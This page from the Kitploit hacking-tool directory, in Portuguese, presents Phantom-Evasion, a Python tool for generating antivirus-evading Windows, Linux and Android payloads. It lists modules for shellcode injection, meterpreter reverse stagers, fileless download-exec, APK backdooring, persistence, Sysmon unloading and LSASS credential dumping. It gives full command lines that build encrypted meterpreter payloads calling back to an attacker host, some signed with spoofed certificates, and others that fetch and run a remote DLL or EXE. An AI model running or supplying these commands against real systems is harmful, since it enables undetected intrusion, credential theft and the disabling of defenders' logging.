Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Phantom-Evasion — Ferramenta de evasão de antivírus em Python | Kitploit
Ferramentas/GitHubGitHub/oddcod3/phantom-evasion
Escalada de PrivilégiosAnálise Dinâmica (Sandboxing)Frameworks de ExploraçãoGeração de PayloadsMecanismos de PersistênciaShellcodePós-ExploraçãoGeração de ShellcodeDesenvolvimento de PayloadsArchived
GitHuboddcod3/phantom-evasion

Phantom-Evasion

1.4k340há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Ferramenta de evasão de antivírus em Python

Ver Repositório

PHANTOM EVASION 3.0

Phantom-Evasion é uma ferramenta de evasão de antivírus escrita em Python (compatível com Python e Python3) capaz de gerar executáveis (quase) totalmente indetectáveis, mesmo com os payloads x86 mais comuns do msfvenom.

Os seguintes SOs suportam configuração automática oficialmente:

  1. Kali Linux
  2. Parrot Security

Os seguintes SOs provavelmente suportam configuração automática, mas exigem instalação manual do metasploit-framework:

  1. OSX (testado no Catalina)
  2. Ubuntu
  3. Linux Mint
  4. Elementary
  5. Deepin
  6. outras distribuições Debian
  7. Centos
  8. Fedora
  9. Blackarch

Os seguintes SOs exigem configuração manual:

  1. Windows 10

Simplesmente faça git clone ou baixe e descompacte a pasta Phantom-Evasion

Configuração:

Configuração automática, abra um terminal e execute:

root@kitploit:~
python3 phantom-evasion.py --setup

ou:

root@kitploit:~
chmod +x ./phantom-evasion.py

./phantom-evasion.py --setup

ou inicie o phantom-evasion em modo interativo e selecione a opção 7

Dependências (apenas para configuração manual)

  1. metasploit-framework
  2. mingw-w64 (cygwin no Windows)
  3. gcc-multilib
  4. apktool
  5. apksigner
  6. strip
  7. osslsigncode

LINHA DE COMANDO/INTERATIVO:

  1. Inicie o phantom-evasion em modo interativo:
root@kitploit:~
python3 phantom-evasion.py

ou:

root@kitploit:~
./phantom-evasion.py
  1. Caso contrário, para ver as opções do modo linha de comando:
root@kitploit:~
python3 phantom-evasion.py --help

ou:

root@kitploit:~
./phantom-evasion.py --help

Módulos WINDOWS

-Todos os módulos C de payload do Windows podem ser compilados (suportam x86 e x64) como EXE ou DLL/ReflectiveDLL.

-Injeção de junkcode randomizada (intensidade, frequência e probabilidade de reinjeção podem ser definidas) e técnicas de evasão de antivírus do Windows (frequência pode ser definida).

-Criptografia Multibyte Xor/Vigenere de shellcode/arquivo suportada tanto nos módulos de injeção de shellcode quanto nos módulos Donwload Exec.

-Técnicas de Ntdll unhookapi e disfarce de processo Peb suportadas.

-Ampla gama de modos de execução suportados (local e remoto).

-Ampla gama de modos de alocação de memória de payload (Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX).

-Carregamento dinâmico de API do Windows pode ser definido.

-Spoofer e assinador de certificado suportados.

-Strip executável (https://en.wikipedia.org/wiki/Strip_(Unix))

Injeção de Shellcode C no Windows

Payloads do Windows do msfvenom e shellcode personalizado suportados.

Shellcode pode ser armazenado como recurso e recuperado em tempo de execução com a API FindResource.

Criptografia de shellcode suportada:

root@kitploit:~
1.nenhum

2.Multibyte-Xor

3.Multibyte-Xor de chave dupla

4.Vigenere

5.Vigenere de chave dupla
  1. O método de execução local pode ser um dos seguintes:

    Thread

    APC

    O modo de alocação de memória local pode ser um dos seguintes:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

  2. O método de execução remota pode ser um dos seguintes:

    ThreadExecutionHijack (abreviado como TEH)

    Processinject (abreviado como PI)

    APCSpray (abreviado como APCS)

    EarlyBird (abreviado como EB)

    EntryPointHijack (abreviado como EPH)

    O modo de alocação de memória remota pode ser um dos seguintes:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

Stager meterpreter C puro para Windows (C)

Módulos stager meterpreter C puro (TCP/HTTP/HTTPS) compatíveis com msfconsole e cobalt strike beacon. (reverse_tcp/reverse_http/reverse_https)

Usando o modo linha de comando:

root@kitploit:~
stager c reverse_tcp é WRT

stager c reverse_http é WRH

stager c reverse_https é WRS
  1. O método de execução local pode ser um dos seguintes:

    Thread

    APC

    O modo de alocação de memória local pode ser um dos seguintes:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RX

Download-Exec C no Windows sem escrita em disco

Baixe exe/dll da URL fornecida na memória e execute/carregue no processo remoto (sem gravar no disco).

Download criptografado de EXE/DLL suportado:

root@kitploit:~
1.nenhum
                                 
2.Multibyte-Xor
                                 
3.Multibyte-Xor de chave dupla
                               
4.Vigenere
                                
5.Vigenere de chave dupla

A DLL/EXE criptografada será salva como nomedoarquivooriginal + "crypt" + ".dll" ou ".exe", este é o arquivo a ser baixado

  1. Windows DownloadExecExe NoDiskWrite (WDE usando modo linha de comando):

    O método de execução remota pode ser um dos seguintes:

    ProcessHollowing (abreviado como PH)

  2. Windows DownloadExecDll NoDiskWrite (WDD usando modo linha de comando):

    O método de carregamento remoto pode ser um dos seguintes:

    ReflectiveDll (abreviado como RD)

    RDAPC (ReflectiveDllAPC)

    ManualMap (abreviado como MM) ---> apenas x86

PAYLOADS LINUX

Módulo de Injeção de Shellcode Linux (C)

Payloads Linux do msfvenom e shellcodes personalizados suportados.

PAYLOADS ANDROID

  1. Backdoor Android Msfvenom Ofuscado:

    Ofusque payloads do msfvenom e reconstrua (smali/baksmali) com apktool. O payload ofuscado pode ser usado para backdoor em arquivos apk benignos.

Módulos de PERSISTÊNCIA

  1. Persistência Windows RegCreateKeyExW Adicionar Chave de Registro (C) O executável compilado precisa ser enviado para a máquina alvo e executado especificando o caminho completo do arquivo a ser adicionado à inicialização como argumento.

  2. Persistência Windows REG Adicionar Chave de Registro (CMD) Este módulo gera payloads de persistência via linha de comando (Adicionar Chave de Registro via REG.exe).

  3. Persistência Windows Manter Processo Ativo (C) O executável compilado precisa ser enviado para a máquina alvo e executado. Use CreateToolSnapshoot ProcessFirst e ProcessNext para verificar se o processo especificado está ativo a cada X segundos (se não, crie um novo processo usando a API WinExec)

  4. Persistência Windows Schtasks (CMD)

    Este módulo gera payloads de persistência via linha de comando (usando Schtasks.exe).

  5. Persistência Windows Criar Serviço (CMD)

    Este módulo gera payloads de persistência via linha de comando (usando sc.exe).

Módulos de ELEVAÇÃO DE PRIVILÉGIO

  1. Windows DuplicateTokenEx (C)

    Crie um novo processo com um token clonado de outro processo. O executável compilado precisa ser enviado para a máquina alvo e executado.

Módulos de PÓS-EXPLORAÇÃO

  1. Windows Descarregar Sysmon (C) Descarregar o driver sysmon, fazendo com que o sistema pare de gravar logs de eventos do sysmon. O executável compilado precisa ser enviado para a máquina alvo e executado.

  2. Windows Descarregar Sysmon (CMD) Descarregar o driver sysmon, fazendo com que o sistema pare de gravar logs de eventos do sysmon.

  3. Windows Attrib ocultar arquivo (CMD) Use attrib para ocultar arquivo

  4. Windows SetFileAttribute oculto (C) Ocultar arquivo usando a API SetFileAttribute O executável compilado precisa ser enviado para a máquina alvo e executado.

  5. Windows DumpLsass (C) Despejar Lsass usando a API MiniWriteDumpWrite. O executável compilado precisa ser enviado para a máquina alvo e executado.

  6. Windows DumpLsass (CMD)

    Despejar Lsass da linha de comando.

Exemplos do modo linha de comando do Phantom-Evasion:

  1. injeção de shellcode no Windows, saída de exe assinado com certificado https falsificado, método de execução local: Thread, mem: Virtual_RWX, criptografia: vigenere
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
  1. injeção de shellcode x64 no Windows, saída como dll reflexiva, método de execução remota: ProcessInject (PI), mem: Virtual_RW/RX, processo alvo: SkypeApp.exe, criptografia: xor de chave dupla
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
  1. injeção de shellcode x64 no Windows, saída como dll sem símbolos, shellcode armazenado como recurso, método de execução remota: EarlyBird (EB), mem: Virtual_RW/RX, processo alvo: svchost.exe, criptografia: xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
  1. stager reverse https x64 no Windows, saída como dll sem símbolos, método de execução local: Thread, mem: Heap_RWX
root@kitploit:~
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
  1. downloadexec dll x86 no Windows, saída como exe sem símbolos, método de execução remota: ManualMap (MM), processo alvo: OneDrive.exe, tamanho do download 1000000 bytes
root@kitploit:~
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000  -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe

  1. downloadexec exe x64 no Windows, saída como dll reflexiva sem símbolos, método de execução remota: ProcessHollowing (PH), processo alvo: svchost.exe, tamanho do download 1000000 bytes
root@kitploit:~
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000  -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll

Licença

GPLv3.0

Créditos e recursos úteis

https://github.com/stephenfewer/ReflectiveDLLInjection

https://github.com/rsmudge/metasploit-loader

https://ired.team

https://github.com/theevilbit/injection

http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf

Baixar ferramenta